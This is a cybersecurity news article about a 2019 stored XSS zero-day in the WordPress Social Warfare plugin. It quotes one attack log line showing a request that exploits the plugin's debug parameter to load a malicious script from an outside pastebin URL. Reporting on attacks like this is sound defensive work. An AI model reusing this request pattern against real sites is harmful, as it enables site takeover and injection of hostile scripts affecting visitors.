Sunday, April 27, 2025
Follow us On Linkedin
HomeExploitZero-day Stored XSS Vulnerability in Wordpress Social Share Plug-in let Hackers to...

Zero-day Stored XSS Vulnerability in WordPress Social Share Plug-in let Hackers to Compromise 70,000 Websites

ExploitUncategorizedWord pressZeo dayZero-Day

Published on

By Balaji

Supply Chain Attack Prevention

SIEM as a Service

Follow Us on Google News

Researchers discovered a critical Stored XSS Zero-day flaw in widely used social sharing plug-in called “Social Warfare” let attackers inject the malicious script and take over the vulnerable WordPress websites.

Social Warfare, a social sharing plugin for WordPress powered by Warfare Plugins that help to get more social shares for WordPress based website developers which can lead to more website traffic.

The plug-in contains a vulnerable code within some of the plugins debugging features that allows the payload gets stored in the site’s database and retrieved with every page request.

- Advertisement - Google News

According to Sucuri research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability. “

This serious zero-day vulnerability allows attackers to completely take over the vulnerable website in the browser environment.

Attackers Already made an Exploits

Cyber Criminals already started abusing this vulnerability and a lot of exploits were distributed around the world.

There are very frequent attempts are ongoing from more than a hundred different IPs as you can see below, 

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

In this case attackers are injecting rogue javascript scripts by loading the following url , which contains this malicious payload.

  • sample payload

If left unpatched, Attackers takes more advantage to mount successful, widespread attacks against vulnerable websites. 

There are 70, 000 websites are actively installed this plugin and the patch has been released and users are advised to update to version 3.5.3 as soon as possible.

Also, you can take this complete online Course Bundle if you want to learn Mastery Web Hacking & Bug Bounty

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

AI

Two Systemic Jailbreaks Uncovered, Exposing Widespread Vulnerabilities in Generative AI Models

Two significant security vulnerabilities in generative AI systems have been discovered, allowing attackers to...
AI

New AI-Generated ‘TikDocs’ Exploits Trust in the Medical Profession to Drive Sales

AI-generated medical scams across TikTok and Instagram, where deepfake avatars pose as healthcare professionals...
Cyber Attack

Gamers Beware! New Attack Targets Gamers to Deploy AgeoStealer Malware

The cybersecurity landscape faces an escalating crisis as AgeoStealer joins the ranks of advanced...
CISO

Compliance And Governance: What Every CISO Needs To Know About Data Protection Regulations

The cybersecurity landscape has changed dramatically in recent years, largely due to the introduction...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

Register Now

More like this

cyber security

Hackers Exploit Ivanti Connect Secure 0-Day to Deploy DslogdRAT and Web Shell

Threat actors exploited a zero-day vulnerability in Ivanti Connect Secure, identified as CVE-2025-0282, to...
cyber security

Google Warns: Threat Actors Growing More Sophisticated, Exploiting Zero-Day Vulnerabilities

Google’s Mandiant team has released its M-Trends 2025 report, highlighting the increasing sophistication of...
Cyber Security News

WordPress Ad-Fraud Plugins Trigger Massive 1.4 Billion Daily Ad Requests

Cybersecurity researchers have uncovered a sprawling ad-fraud operation exploiting WordPress plugins to trigger over...

GBHackers on Security is a top cybersecurity news platform, delivering up-to-date coverage on breaches, emerging threats, malware, vulnerabilities, and global cyber incidents.

Company

Trending

Categories

Copyright @ 2016 - 2025 GBHackers On Security - All Rights Reserved